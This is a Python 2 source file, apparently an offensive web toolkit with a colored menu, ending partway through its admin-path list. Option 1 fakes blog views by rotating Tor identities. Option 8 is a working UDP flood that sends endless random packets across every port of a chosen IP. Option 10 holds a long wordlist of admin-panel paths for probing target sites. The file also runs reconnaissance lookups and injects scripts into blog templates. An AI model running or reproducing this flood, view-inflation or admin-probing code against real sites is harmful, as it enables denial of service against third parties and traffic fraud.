def menu():
    menu = w + '''

    #>Visitor
        |__> 1) ''' + y + '''AutoVisitor''' + w + '''
        |__> 2) ''' + y + '''Jingling Someone's Web ( Attack ) ''' + c + '''// Premium Tools''' + w + '''
    ''' + g + '''<''' + r + '''+''' + a + '''---------------------------------''' + r + '''+''' + g + '''>''' + w + '''
     #>InfoBlog
        |__> 3) ''' + y + '''All_Info_Web''' + w + '''
        |__> 4) ''' + y + '''TCP Port Scan''' + w + '''
        |__> 5) ''' + y + '''Check Header''' + w + '''
    ''' + g + '''<''' + r + '''+''' + a + '''---------------------------------''' + r + '''+''' + g + '''>''' + w + '''
     #>Setting Blog
        |__> 6) ''' + y + '''Remove ?m=1 from the web''' + w + '''
        |__> 7) ''' + y + '''Remove Date and Time''' + w + '''
    ''' + g + '''<''' + r + '''+''' + a + '''---------------------------------''' + r + '''+''' + g + '''>''' + w + '''
     #>Web Attacking
        |__> 8) ''' + y + '''Ddos''' + w + '''
        |__> 9) ''' + y + '''Bug Finder ''' + c + '''//Premium''' + w + '''
        |__> 10) ''' + y + '''Admin Finder''' + w + '''
        |__> 11) ''' + y + '''Dorker Tools ''' + c + '''//Premium''' + w + '''
    ''' + g + '''<''' + r + '''+''' + a + '''---------------------------------''' + r + '''+''' + g + '''>''' + w + '''
     #>Tools Info
        |__> 12) ''' + y + '''About Tools''' + w + '''
        |__> 13) ''' + y + '''Contact''' + w + '''
    ''' + g + '''<''' + r + '''+''' + a + '''---------------------------------''' + r + '''+''' + g + '''>'''
    print menu
    men_in = raw_input(g + 'Choose a tool : ' + y)
    if men_in == "1":
        headers = {
            "User-Agent":
            "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36"
        }
        proxyPort = 9050
        ctrlPort = 9051
        site = raw_input("Enter your Blog Address : ")
        blog = input("Enter The number of Viewers : ")

        def run():
            response = tr.get(site, headers=headers, verify=False)
            print g + "[" + str(
                i) + "]" + " Blog View Added With IP:" + tr.get(
                    'http://ipecho.net/plain').content
            tr.reset_identity()

        if __name__ == '__main__':
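            # Optional CLI overrides for the Tor SOCKS (proxy) and control ports.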
            if len(sys.argv) > 3:
                if sys.argv[1] and sys.argv[2]:
                    proxyPort = sys.argv[1]
                    ctrlPort = sys.argv[2]
            with TorRequest(proxy_port=proxyPort,
                            ctrl_port=ctrlPort,
                            password=None) as tr:
                for i in range(blog):
                    run()
    elif men_in == "3":
        print y + "Don't include https:// or http://"
        target = raw_input(g + '#> ' + w)

        def ip():
            try:
                IP = socket.gethostbyname(target)
                print "IP address of " + g + target + w + " is " + g + IP + w
            except socket.gaierror:
                print "Unable to resolve " + target

        def http():
            page = o('https://api.hackertarget.com/httpheaders/?q=' +
                     target).read()
            print page

        def dns():
            page = o('https://api.hackertarget.com/dnslookup/?q=' +
                     target).read()
            print page

        def geo():
            IP = socket.gethostbyname(target)
            page = o('https://api.hackertarget.com/geoip/?q=' + IP).read()
            print page

        print '''
  <-----------IP WEB / BLOG----------->'''
        ip()
        print '''
  <-----------PORT----------->'''
        print w + target + g + ':80' + w
        print '''
  <-----------HTTP Header----------->''' + g
        http()
        print w + '''
  <-----------Domain Name Server----------->''' + g
        dns()
        print w + '''
  <-----------Geo Ip----------->''' + g
        geo()
# Option 4
    if men_in == "4":
        print y + "Don't include https:// or http://"
        target = raw_input(g + '#> ' + w)
        page = o('https://api.hackertarget.com/nmap/?q=' + target).read()
        print g + page
# Option 5
    if men_in == "5":
        print y + "Don't include https:// or http://"
        target = raw_input(g + '#> ' + w)
        page = o('https://api.hackertarget.com/httpheaders/?q=' +
                 target).read()
        print
        print g + page


# Option 6
    if men_in == "6":
        print y + 'Enter the location of your blog template'
        path = raw_input(g + '#>' + w)

        template = open(path, "r+")
        ganti = '''<script type='text/javascript'>
var uri = window.location.toString(); if (uri.indexOf("%3D","%3D") > 0) {var clean_uri = uri.substring(0, uri.indexOf("%3D")); window.history.replaceState({}, document.title, clean_uri);}var uri = window.location.toString();if (uri.indexOf("%3D%3D","%3D%3D") > 0) {var clean_uri = uri.substring(0, uri.indexOf("%3D%3D")); window.history.replaceState({}, document.title, clean_uri);}
var uri = window.location.toString(); if (uri.indexOf("&m=1","&m=1") > 0) {var clean_uri = uri.substring(0, uri.indexOf("&m=1")); window.history.replaceState({}, document.title, clean_uri);}
var uri = window.location.toString();if (uri.indexOf("?m=1","?m=1") > 0) {var clean_uri = uri.substring(0, uri.indexOf("?m=1")); window.history.replaceState({}, document.title, clean_uri);}
</script></body>'''
        hm = template.read().replace('</body>', ganti)
        al = open('hasil_hilang_m1.xml', 'w')
        al.write(hm)
        al.close()
        template.close()
        print w + '[' + g + '√' + w + ']' + a + 'Saved ' + g + 'hasil_hilang_m1.xml' + a + ', upload (hasil_hilang_m1.xml) to your blog'

    if men_in == "7":
        print y + 'Enter the location of your blog template'
        path = raw_input(g + '#>' + w)

        template = open(path, "r+")
        ganti = '''<script type='text/javascript'>
//<![CDATA[
// BloggerJS v0.3.1
// Copyright (c) 2017-2018 Kenny Cruz
// Licensed under the MIT License
var urlTotal,nextPageToken,postsDatePrefix=!1,accessOnly=!1,useApiV3=!1,apiKey="",blogId="",postsOrPages=["pages","posts"],jsonIndex=1,secondRequest=!0,feedPriority=0,amp="&amp;"[0];function urlVal(){var e=window.location.pathname,t=e.length;return".html"===e.substring(t-5)?0:t>1?1:2}function urlMod(){var e=window.location.pathname;"p"===e.substring(1,2)?(e=(e=e.substring(e.indexOf("/",1)+1)).substr(0,e.indexOf(".html")),history.replaceState(null,null,"../"+e)):(e=(e=postsDatePrefix?e.substring(1):e.substring(e.indexOf("/",7)+1)).substr(0,e.indexOf(".html")),history.replaceState(null,null,"../../"+e))}function urlSearch(e,t){var n=e+".html";t.forEach(function(e){-1!==e.search(n)&&(window.location=e)})}function urlManager(){var e=urlVal();0===e?accessOnly||urlMod():1===e?getJSON(postsOrPages[feedPriority],1):2===e&&(accessOnly||history.replaceState(null,null,"/"))}function getJSON(e,t){var n=document.createElement("script");if(useApiV3){var o="https://www.googleapis.com/blogger/v3/blogs/"+blogId+"/"+e+"?key="+apiKey+"#maxResults=500#fields=nextPageToken%2Citems(url)#callback=bloggerJSON";nextPageToken&&(o+="#pageToken="+nextPageToken),nextPageToken=void 0}else o=window.location.protocol+"//"+window.location.hostname+"/feeds/"+e+"/default?start-index="+t+"#max-results=150#orderby=published#alt=json-in-script#callback=bloggerJSON";o=o.replace(/#/g,amp),n.type="text/javascript",n.src=o,document.getElementsByTagName("head")[0].appendChild(n)}function bloggerJSON(e){var t=[];if(useApiV3||void 0===urlTotal&&(urlTotal=parseInt(e.feed.openSearch$totalResults.$t)),useApiV3){try{e.items.forEach(function(e,n){t.push(e.url)})}catch(e){}nextPageToken=e.nextPageToken}else try{e.feed.entry.forEach(function(n,o){var r=e.feed.entry[o];r.link.forEach(function(e,n){"alternate"===r.link[n].rel&&t.push(r.link[n].href)})})}catch(e){}urlSearch(window.location.pathname,t),urlTotal>150?(jsonIndex+=150,urlTotal-=150,getJSON(postsOrPages[feedPriority],jsonIndex)):nextPageToken?getJSON(postsOrPages[feedPriority]):secondRequest&&(nextPageToken=void 0,urlTotal=void 0,jsonIndex=1,secondRequest=!1,0===feedPriority?(feedPriority=1,getJSON("posts",1)):1===feedPriority&&(feedPriority=0,getJSON("pages",1)))}function bloggerJS(e){e&&(feedPriority=e),urlManager()}bloggerJS();
//]]>
</script></body>'''
        hm = template.read().replace('</body>', ganti)
        al = open('hasil_hilang_m1.xml', 'w')
        al.write(hm)
        al.close()
        template.close()
        print w + '[' + g + '√' + w + ']' + a + 'Saved ' + g + 'hasil_hilang_m1.xml' + a + ', upload (hasil_hilang_m1.xml) to your blog'
    if men_in == "8":
        now = datetime.now()
        hour = now.hour
        minute = now.minute
        day = now.day
        month = now.month
        year = now.year
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        bytes = random._urandom(1490)
        ip = raw_input(g + "IP Target : " + w)
        port = input(g + "Port       : " + w)
        sent = 0
        while True:
            sock.sendto(bytes, (ip, port))
            sent = sent + 1
            print g + "Sent %s packets to %s on port %s" % (sent, ip, port)
            port = port + 1
            if port == 65534:
                port = 1

    if men_in == "10":
        url = raw_input(g + 'Target : ' + w)
        passe = (
            'admin/',
            'administrator/',
            'login.php',
            'administration/',
            'admin1/',
            'admin2/',
            'admin3/',
            'admin4/',
            'admin5/',
            'moderator/',
            'webadmin/',
            'adminarea/',
            'bb-admin/',
            'adminLogin/',
            'admin_area/',
            'panel-administracion/',
            'instadmin/',
            'memberadmin/',
            'administratorlogin/',
            'adm/',
            'account.asp',
            'admin/account.asp',
            'admin/index.asp',
            'admin/login.asp',
            'admin/admin.asp',
            '/login.aspx',
            'admin_area/admin.asp',
            'admin_area/login.asp',
            'admin/account.html',
            'admin/index.html',
            'admin/login.html',
            'admin/admin.html',
            'admin_area/admin.html',
            'admin_area/login.html',
            'admin_area/index.html',
            'admin_area/index.asp',
            'bb-admin/index.asp',
            'bb-admin/login.asp',
            'bb-admin/admin.asp',
            'bb-admin/index.html',
            'bb-admin/login.html',
            'bb-admin/admin.html',
            'admin/home.html',
            'admin/controlpanel.html',
            'admin.html',
            'admin/cp.html',
            'cp.html',
            'administrator/index.html',
            'administrator/login.html',
            'administrator/account.html',
            'administrator.html',
            'login.html',
            'modelsearch/login.html',
            'moderator.html',
            'moderator/login.html',
            'moderator/admin.html',
            'account.html',
            'controlpanel.html',
            'admincontrol.html',
            'admin_login.html',
            'panel-administracion/login.html',
            'admin/home.asp',
            'admin/controlpanel.asp',
            'admin.asp',
            'pages/admin/admin-login.asp',
            'admin/admin-login.asp',
            'admin-login.asp',
            'admin/cp.asp',
            'cp.asp',
            'administrator/account.asp',
            'administrator.asp',
            'acceso.asp',
            'login.asp',
            'modelsearch/login.asp',
            'moderator.asp',
            'moderator/login.asp',
            'administrator/login.asp',
            'moderator/admin.asp',
            'controlpanel.asp',
            'admin/account.html',
            'adminpanel.html',
            'webadmin.html',
            'administration',
            'pages/admin/admin-login.html',
            'admin/admin-login.html',
            'webadmin/index.html',
            'webadmin/admin.html',
            'webadmin/login.html',
            'user.asp',
            'user.html',
            'admincp/index.asp',
            'admincp/login.asp',
            'admincp/index.html',
            'admin/adminLogin.html',
            'adminLogin.html',
            'admin/adminLogin.html',
            'home.html',
            'adminarea/index.html',
            'adminarea/admin.html',
            'adminarea/login.html',
            'panel-administracion/index.html',
            'panel-administracion/admin.html',
            'modelsearch/index.html',
            'modelsearch/admin.html',
            'admin/admin_login.html',
            'admincontrol/login.html',
            'adm/index.html',
            'adm.html',
            'admincontrol.asp',
            'admin/account.asp',
            'adminpanel.asp',
            'webadmin.asp',
            'webadmin/index.asp',
            'webadmin/admin.asp',
            'webadmin/login.asp',
            'admin/admin_login.asp',
            'admin_login.asp',
            'panel-administracion/login.asp',
            'adminLogin.asp',
            'admin/adminLogin.asp',
            'home.asp',
            'admin.asp',
            'adminarea/index.asp',
            'adminarea/admin.asp',
            'adminarea/login.asp',
            'admin-login.html',
            'panel-administracion/index.asp',
            'panel-administracion/admin.asp',
            'modelsearch/index.asp',
            'modelsearch/admin.asp',
            'administrator/index.asp',
            'admincontrol/login.asp',
            'adm/admloginuser.asp',
            'admloginuser.asp',
            'admin2.asp',
            'admin2/login.asp',
            'admin2/index.asp',
            'adm/index.asp',
            'adm.asp',
            'affiliate.asp',
            'adm_auth.asp',
            'memberadmin.asp',
            'administratorlogin.asp',
            'siteadmin/login.asp',
            'siteadmin/index.asp',
            'siteadmin/login.html',
            'memberadmin/',
            'administratorlogin/',
            'adm/',
            'admin/account.php',
            'admin/index.php',
            'admin/login.php',
            'admin/admin.php',
            'admin/account.php',
            'admin_area/admin.php',
            'admin_area/login.php',
            'siteadmin/login.php',
            'siteadmin/index.php',
            'siteadmin/login.html',
            'admin/account.html',
            'admin/index.html',
            'admin/login.html',
            'admin/admin.html',
            'admin_area/index.php',
            'bb-admin/index.php',
            'bb-admin/login.php',
            'bb-admin/admin.php',
            'admin/home.php',
            'admin_area/login.html',
            'admin_area/index.html',
            'admin/controlpanel.php',
            'admin.php',
            'admincp/index.asp',
            'admincp/login.asp',
            'admincp/index.html',
            'admin/account.html',
            'adminpanel.html',
            'webadmin.html',
            'webadmin/index.html',
            'webadmin/admin.html',
            'webadmin/login.html',
            'admin/admin_login.html',
            'admin_login.html',
            'panel-administracion/login.html',
            'admin/cp.php',
            'cp.php',
            'administrator/index.php',
            'administrator/login.php',
            'nsw/admin/login.php',
            'webadmin/login.php',
            'admin/admin_login.php',
            'admin_login.php',
            'administrator/account.php',
            'administrator.php',
            'admin_area/admin.html',
            'pages/admin/admin-login.php',
            'admin/admin-login.php',
            'admin-login.php',
            'bb-admin/index.html',
            'bb-admin/login.html',
            'acceso.php',
            'bb-admin/admin.html',
            'admin/home.html',
            'login.php',
            'modelsearch/login.php',
            'moderator.php',
            'moderator/login.php',
            'moderator/admin.php',
            'account.php',
            'pages/admin/admin-login.html',
            'admin/admin-login.html',
            'admin-login.html',
            'controlpanel.php',
            'admincontrol.php',
            'admin/adminLogin.html',
            'adminLogin.html',
            'admin/adminLogin.html',
            'home.html',
            'rcjakar/admin/login.php',
            'adminarea/index.html',
            'adminarea/admin.html',
            'webadmin.php',
            'webadmin/index.php',
            'webadmin/admin.php',
            'admin/controlpanel.html',
            'admin.html',
            'admin/cp.html',
            'cp.html',
            'adminpanel.php',
            'moderator.html',
            'administrator/index.html',
            'administrator/login.html',
            'user.html',
            'administrator/account.html',
            'administrator.html',
            'login.html',
            'modelsearch/login.html',
            'moderator/login.html',
            'adminarea/login.html',
            'panel-administracion/index.html',
            'panel-administracion/admin.html',
            'modelsearch/index.html',
            'modelsearch/admin.html',
            'admincontrol/login.html',
            'adm/index.html',
            'adm.html',
            'moderator/admin.html',
            'user.php',
            'account.html',
            'controlpanel.html',
            'admincontrol.html',
            'panel-administracion/login.php',
            'wp-login.php',
            'adminLogin.php',
            'admin/adminLogin.php',
            'home.php',
            'admin.php',
            'adminarea/index.php',
            'adminarea/admin.php',
            'adminarea/login.php',
            'panel-administracion/index.php',
            'panel-administracion/admin.php',
            'modelsearch/index.php',
            'modelsearch/admin.php',
            'admincontrol/login.php',
            'adm/admloginuser.php',
            'admloginuser.php',
            'admin2.php',
            'admin2/login.php',
            'admin2/index.php',
            'usuarios/login.php',
            'adm/index.php',
            'adm.php',
            'affiliate.php',
            'adm_auth.php',
            'memberadmin.php',
            'administratorlogin.php',
            'adm/',
            'admin/account.cfm',
            'admin/index.cfm',
            'admin/login.cfm',
            'admin/admin.cfm',
            'admin/account.cfm',
            'admin_area/admin.cfm',
            'admin_area/login.cfm',
            'siteadmin/login.cfm',
            'siteadmin/index.cfm',
            'siteadmin/login.html',
            'admin/account.html',
            'admin/index.html',
            'admin/login.html',
            'admin/admin.html',
            'admin_area/index.cfm',
            'bb-admin/index.cfm',
            'bb-admin/login.cfm',
            'bb-admin/admin.cfm',
            'admin/home.cfm',
            'admin_area/login.html',
            'admin_area/index.html',
            'admin/controlpanel.cfm',
            'admin.cfm',
            'admincp/index.asp',
            'admincp/login.asp',
            'admincp/index.html',
            'admin/account.html',
            'adminpanel.html',
            'webadmin.html',
            'webadmin/index.html',
            'webadmin/admin.html',
            'webadmin/login.html',
            'admin/admin_login.html',
            'admin_login.html',
            'panel-administracion/login.html',
            'admin/cp.cfm',
            'cp.cfm',
            'administrator/index.cfm',
            'administrator/login.cfm',
            'nsw/admin/login.cfm',
            'webadmin/login.cfm',
            'admin/admin_login.cfm',
            'admin_login.cfm',
            'administrator/account.cfm',
            'administrator.cfm',
            'admin_area/admin.html',
            'pages/admin/admin-login.cfm',
            'admin/admin-login.cfm',
            'admin-login.cfm',
            'bb-admin/index.html',
            'bb-admin/login.html',
            'bb-admin/admin.html',
            'admin/home.html',
            'login.cfm',
            'modelsearch/login.cfm',
            'moderator.cfm',
            'moderator/login.cfm',
            'moderator/admin.cfm',
            'account.cfm',
            'pages/admin/admin-login.html',
            'admin/admin-login.html',
            'admin-login.html',
            'controlpanel.cfm',
            'admincontrol.cfm',
            'admin/adminLogin.html',
            'acceso.cfm',
            'adminLogin.html',
            'admin/adminLogin.html',
            'home.html',
            'rcjakar/admin/login.cfm',
            'adminarea/index.html',
            'adminarea/admin.html',
            'webadmin.cfm',
            'webadmin/index.cfm',
            'webadmin/admin.cfm',
            'admin/controlpanel.html',
            'admin.html',
            'admin/cp.html',
            'cp.html',
            'adminpanel.cfm',
            'moderator.html',
            'administrator/index.html',
            'administrator/login.html',
            'user.html',
            'administrator/account.html',
            'administrator.html',
            'login.html',
            'modelsearch/login.html',
            'moderator/login.html',
            'adminarea/login.html',
            'panel-administracion/index.html',
            'panel-administracion/admin.html',
            'modelsearch/index.html',
            'modelsearch/admin.html',
            'admincontrol/login.html',
            'adm/index.html',
            'adm.html',
            'moderator/admin.html',
            'user.cfm',
            'account.html',
            'controlpanel.html',
            'admincontrol.html',
            'panel-administracion/login.cfm',
            'wp-login.cfm',
            'adminLogin.cfm',
            'admin/adminLogin.cfm',
            'home.cfm',
            'admin.cfm',
            'adminarea/index.cfm',
            'adminarea/admin.cfm',
            'adminarea/login.cfm',
            'panel-administracion/index.cfm',
            'panel-administracion/admin.cfm',
            'modelsearch/index.cfm',
            'modelsearch/admin.cfm',
            'admincontrol/login.cfm',
            'adm/admloginuser.cfm',
            'admloginuser.cfm',
            'admin2.cfm',
            'admin2/login.cfm',
            'admin2/index.cfm',
            'usuarios/login.cfm',
            'adm/index.cfm',
            'adm.cfm',
            'affiliate.cfm',
            'adm_auth.cfm',
            'memberadmin.cfm',
            'administratorlogin.cfm',
            'adminLogin/',
            'admin_area/',
            'panel-administracion/',
            'instadmin/',
            'login.aspx',
            'memberadmin/',
            'administratorlogin/',
            'adm/',
            'admin/account.aspx',
            'admin/index.aspx',
            'admin/login.aspx',
            'admin/admin.aspx',
            'admin/account.aspx',
            'admin_area/admin.aspx',
            'admin_area/login.aspx',
            'siteadmin/login.aspx',
            'siteadmin/index.aspx',
            'siteadmin/login.html',
            'admin/account.html',
            'admin/index.html',
            'admin/login.html',
            'admin/admin.html',
            'admin_area/index.aspx',
            'bb-admin/index.aspx',
            'bb-admin/login.aspx',
            'bb-admin/admin.aspx',
            'admin/home.aspx',
            'admin_area/login.html',
            'admin_area/index.html',
            'admin/controlpanel.aspx',
            'admin.aspx',
            'admincp/index.asp',
            'admincp/login.asp',
            'admincp/index.html',
            'admin/account.html',
            'adminpanel.html',
            'webadmin.html',
            'webadmin/index.html',
            'webadmin/admin.html',
            'webadmin/login.html',
            'admin/admin_login.html',
            'admin_login.html',
            'panel-administracion/login.html',
            'admin/cp.aspx',
            'cp.aspx',
            'administrator/index.aspx',
            'administrator/login.aspx',
            'nsw/admin/login.aspx',
            'webadmin/login.aspx',
            'admin/admin_login.aspx',
            'admin_login.aspx',
            'administrator/account.aspx',
            'administrator.aspx',
            'admin_area/admin.html',
            'pages/admin/admin-login.aspx',
            'admin/admin-login.aspx',
            'admin-login.aspx',
            'bb-admin/index.html',
            'bb-admin/login.html',
            'bb-admin/admin.html',
            'admin/home.html',
            'login.aspx',
            'modelsearch/login.aspx',
            'moderator.aspx',
            'moderator/login.aspx',
            'moderator/admin.aspx',
            'acceso.aspx',
            'account.aspx',
            'pages/admin/admin-login.html',
            'admin/admin-login.html',
            'admin-login.html',
            'controlpanel.aspx',
            'admincontrol.aspx',
            'admin/adminLogin.html',
            'adminLogin.html',
            'admin/adminLogin.html',
            'home.html',
            'rcjakar/admin/login.aspx',
            'adminarea/index.html',
            'adminarea/admin.html',
            'webadmin.aspx',
            'webadmin/index.aspx',
            'webadmin/admin.aspx',
            'admin/controlpanel.html',
            'admin.html',
            'admin/cp.html',
            'cp.html',
            'adminpanel.aspx',
            'moderator.html',
            'administrator/index.html',
            'administrator/login.html',
            'user.html',
            'administrator/account.html',
            'administrator.html',
            'login.html',
            'modelsearch/login.html',
            'moderator/login.html',
            'adminarea/login.html',
            'panel-administracion/index.html',
            'panel-administracion/admin.html',
            'modelsearch/index.html',
            'modelsearch/admin.html',
            'admincontrol/login.html',
            'adm/index.html',
            'adm.html',
            'moderator/admin.html',
            'user.aspx',
            'account.html',
            'controlpanel.html',
            'admincontrol.html',
            'panel-administracion/login.aspx',
            'wp-login.aspx',
            'adminLogin.aspx',
            'admin/adminLogin.aspx',
            'home.aspx',
            'admin.aspx',
            'adminarea/index.aspx',
            'adminarea/admin.aspx',
            'adminarea/login.aspx',
            'panel-administracion/index.aspx',
            'panel-administracion/admin.aspx',
            'modelsearch/index.aspx',
            'modelsearch/admin.aspx',
            'admincontrol/login.aspx',
            'adm/admloginuser.aspx',
            'admloginuser.aspx',
            'admin2.aspx',
            'admin2/login.aspx',
            'admin2/index.aspx',
            'usuarios/login.aspx',
            'adm/index.aspx',
            'adm.aspx',
            'affiliate.aspx',
            'adm_auth.aspx',
            'memberadmin.aspx',
            'administratorlogin.aspx',
            'memberadmin/',
            'administratorlogin/',
            'adm/',
            'admin/account.js',
            'admin/index.js',
            'admin/login.js',
            'admin/admin.js',
            'admin/account.js',
            'admin_area/admin.js',
            'admin_area/login.js',
            'siteadmin/login.js',
            'siteadmin/index.js',
            'siteadmin/login.html',
            'admin/account.html',
            'admin/index.html',
            'admin/login.html',
            'admin/admin.html',
            'admin_area/index.js',
            'bb-admin/index.js',
            'bb-admin/login.js',
            'bb-admin/admin.js',
            'admin/home.js',
            'admin_area/login.html',
            'admin_area/index.html',
            'admin/controlpanel.js',
            'admin.js',
            'admincp/index.asp',
            'admincp/login.asp',
            'admincp/index.html',
            'admin/account.html',
            'adminpanel.html',
            'webadmin.html',
            'webadmin/index.html',
            'webadmin/admin.html',
            'webadmin/login.html',
            'admin/admin_login.html',
            'admin_login.html',
            'panel-administracion/login.html',
            'admin/cp.js',
            'cp.js',
            'administrator/index.js',
            'administrator/login.js',
            'nsw/admin/login.js',
            'webadmin/login.js',
            'admin/admin_login.js',
            'admin_login.js',
            'administrator/account.js',
            'administrator.js',
            'admin_area/admin.html',
            'pages/admin/admin-login.js',
            'admin/admin-login.js',
            'admin-login.js',
            'bb-admin/index.html',
            'bb-admin/login.html',
            'bb-admin/admin.html',
            'admin/home.html',
            'login.js',
            'modelsearch/login.js',
            'moderator.js',
            'moderator/login.js',
            'moderator/admin.js',
            'account.js',
            'pages/admin/admin-login.html',
            'admin/admin-login.html',
            'admin-login.html',
            'controlpanel.js',
            'admincontrol.js',
            'admin/adminLogin.html',
            'adminLogin.html',
            'admin/adminLogin.html',
            'home.html',
            'rcjakar/admin/login.js',
            'adminarea/index.html',
            'adminarea/admin.html',
            'webadmin.js',
            'webadmin/index.js',
            'acceso.js',
            'webadmin/admin.js',
            'admin/controlpanel.html',
            'admin.html',
            'admin/cp.html',
            'cp.html',
            'adminpanel.js',
            'moderator.html',
            'administrator/index.html',
            'administrator/login.html',
            'user.html',
            'administrator/account.html',
            'administrator.html',
            'login.html',
            'modelsearch/login.html',
            'moderator/login.html',
            'adminarea/login.html',
            'panel-administracion/index.html',
            'panel-administracion/admin.html',
            'modelsearch/index.html',
            'modelsearch/admin.html',
            'admincontrol/login.html',
            'adm/index.html',
            'adm.html',
            'moderator/admin.html',
            'user.js',
            'account.html',
            'controlpanel.html',
            'admincontrol.html',
            'panel-administracion/login.js',
            'wp-login.js',
            'adminLogin.js',
            'admin/adminLogin.js',
            'home.js',
            'admin.js',
            'adminarea/index.js',
            'adminarea/admin.js',
            'adminarea/login.js',
            'panel-administracion/index.js',
            'panel-administracion/admin.js',
            'modelsearch/index.js',
            'modelsearch/admin.js',
            'admincontrol/login.js',
            'adm/admloginuser.js',
            'admloginuser.js',
            'admin2.js',
            'admin2/login.js',
            'admin2/index.js',
            'usuarios/login.js',
            'adm/index.js',
            'adm.js',
            'affiliate.js',
            'adm_auth.js',
            'memberadmin.js',
            'administratorlogin.js',
            'bb-admin/index.cgi',
            'bb-admin/login.cgi',
            'bb-admin/admin.cgi',
            'admin/home.cgi',
            'admin_area/login.html',
            'admin_area/index.html',
            'admin/controlpanel.cgi',
            'admin.cgi',
            'admincp/index.asp',
            'admincp/login.asp',
            'admincp/index.html',
            'admin/account.html',
            'adminpanel.html',
            'webadmin.html',
            'webadmin/index.html',
            'webadmin/admin.html',
            'webadmin/login.html',
            'admin/admin_login.html',
            'admin_login.html',
            'panel-administracion/login.html',
            'admin/cp.cgi',
            'cp.cgi',
            'administrator/index.cgi',
            'administrator/login.cgi',
            'nsw/admin/login.cgi',
            'webadmin/login.cgi',
            'admin/admin_login.cgi',
            'admin_login.cgi',
            'administrator/account.cgi',
            'administrator.cgi',
            'admin_area/admin.html',
            'pages/admin/admin-login.cgi',
            'admin/admin-login.cgi',
            'admin-login.cgi',
            'bb-admin/index.html',
            'bb-admin/login.html',
            'bb-admin/admin.html',
            'admin/home.html',
            'login.cgi',
            'modelsearch/login.cgi',
            'moderator.cgi',
            'moderator/login.cgi',
            'moderator/admin.cgi',
            'account.cgi',
            'pages/admin/admin-login.html',
            'admin/admin-login.html',
            'admin-login.html',
            'controlpanel.cgi',
            'admincontrol.cgi',
            'admin/adminLogin.html',
            'adminLogin.html',
            'admin/adminLogin.html',
            'home.html',
            'rcjakar/admin/login.cgi',
            'adminarea/index.html',
            'adminarea/admin.html',
            'webadmin.cgi',
            'webadmin/index.cgi',
            'acceso.cgi',
            'webadmin/admin.cgi',
            'admin/controlpanel.html',
            'admin.html',
            'admin/cp.html',
            'cp.html',
            'adminpanel.cgi',
            'moderator.html',
            'administrator/index.html',
            'administrator/login.html',
            'user.html',
            'administrator/account.html',
            'administrator.html',
            'login.html',
            'modelsearch/login.html',
            'moderator/login.html',
            'adminarea/login.html',
            'panel-administracion/index.html',
            'panel-administracion/admin.html',
            'modelsearch/index.html',
            'modelsearch/admin.html',
            'admincontrol/login.html',
            'adm/index.html',
            'adm.html',
            'moderator/admin.html',
            'user.cgi',
            'account.html',
            'controlpanel.html',
            'admincontrol.html',
            'panel-administracion/login.cgi',
            'wp-login.cgi',
            'adminLogin.cgi',
            'admin/adminLogin.cgi',
            'home.cgi',
            'admin.cgi',
            'adminarea/index.cgi',
            'adminarea/admin.cgi',
            'adminarea/login.cgi',
            'panel-administracion/index.cgi',
            'panel-administracion/admin.cgi',
            'modelsearch/index.cgi',
            'modelsearch/admin.cgi',
            'admincontrol/login.cgi',
            'adm/admloginuser.cgi',
            'admloginuser.cgi',
            'admin2.cgi',
            'admin2/login.cgi',
            'admin2/index.cgi',
            'usuarios/login.cgi',
            'adm/index.cgi',
            'adm.cgi',
            'affiliate.cgi',
            'adm_auth.cgi',
            'memberadmin.cgi',
            'administratorlogin.cgi',
            'admin_area/admin.brf',
            'admin_area/login.brf',
            'siteadmin/login.brf',
            'siteadmin/index.brf',
            'siteadmin/login.html',
            'admin/account.html',
            'admin/index.html',
            'admin/login.html',
            'admin/admin.html',
            'admin_area/index.brf',
            'bb-admin/index.brf',
            'bb-admin/login.brf',
            'bb-admin/admin.brf',
            'admin/home.brf',
            'admin_area/login.html',
            'admin_area/index.html',
            'admin/controlpanel.brf',
            'admin.brf',
            'admincp/index.asp',
            'admincp/login.asp',
            'admincp/index.html',
            'admin/account.html',
            'adminpanel.html',
            'webadmin.html',
            'webadmin/index.html',
            'webadmin/admin.html',
            'webadmin/login.html',
            'admin/admin_login.html',
            'admin_login.html',
            'panel-administracion/login.html',
            'admin/cp.brf',
            'cp.brf',
            'administrator/index.brf',
            'administrator/login.brf',
            'nsw/admin/login.brf',
            'webadmin/login.brfbrf',
            'admin/admin_login.brf',
            'admin_login.brf',
            'administrator/account.brf',
            'administrator.brf',
            'acceso.brf',
            'admin_area/admin.html',
            'pages/admin/admin-login.brf',
            'admin/admin-login.brf',
            'admin-login.brf',
            'bb-admin/index.html',
            'bb-admin/login.html',
            'bb-admin/admin.html',
            'admin/home.html',
            'login.brf',
            'modelsearch/login.brf',
            'moderator.brf',
            'moderator/login.brf',
            'moderator/admin.brf',
            'account.brf',
            'pages/admin/admin-login.html',
            'admin/admin-login.html',
            'admin-login.html',
            'controlpanel.brf',
            'admincontrol.brf',
            'admin/adminLogin.html',
            'adminLogin.html',
            'admin/adminLogin.html',
            'home.html',
            'rcjakar/admin/login.brf',
            'adminarea/index.html',
            'adminarea/admin.html',
            'webadmin.brf',
            'webadmin/index.brf',
            'webadmin/admin.brf',
            'admin/controlpanel.html',
            'admin.html',
            'admin/cp.html',
            'cp.html',
            'adminpanel.brf',
            'moderator.html',
            'administrator/index.html',
            'administrator/login.html',
            'user.html',
            'administrator/account.html',
            'administrator.html',
            'login.html',
            'modelsearch/login.html',
            'moderator/login.html',
            'adminarea/login.html',
            'panel-administracion/index.html',
            'panel-administracion/admin.html',
            'modelsearch/index.html',
            'modelsearch/admin.html',
            'admincontrol/login.html',
            'adm/index.html',
            'adm.html',
            'moderator/admin.html',
            'user.brf',
            'account.html',
            'controlpanel.html',
            'admincontrol.html',
            'panel-administracion/login.brf',
            'wp-login.brf',
            'adminLogin.brf',
            'admin/adminLogin.brf',
            'home.brf',
            'admin.brf',
            'adminarea/index.brf',
            'adminarea/admin.brf',
            'adminarea/login.brf',
            'panel-administracion/index.brf',
            'panel-administracion/admin.brf',
            'modelsearch/index.brf',
            'modelsearch/admin.brf',
            'admincontrol/login.brf',
            'adm/admloginuser.brf',
            'admloginuser.brf',
            'admin2.brf',
            'admin2/login.brf',
            'admin2/index.brf',
            'usuarios/login.brf',
            'adm/index.brf',
            'adm.brf',
            'affiliate.brf',
            'adm_auth.brf',
            'memberadmin.brf',
            'administratorlogin.brf',
            'cpanel',
            'cpanel.php',
            'cpanel.html',
        )
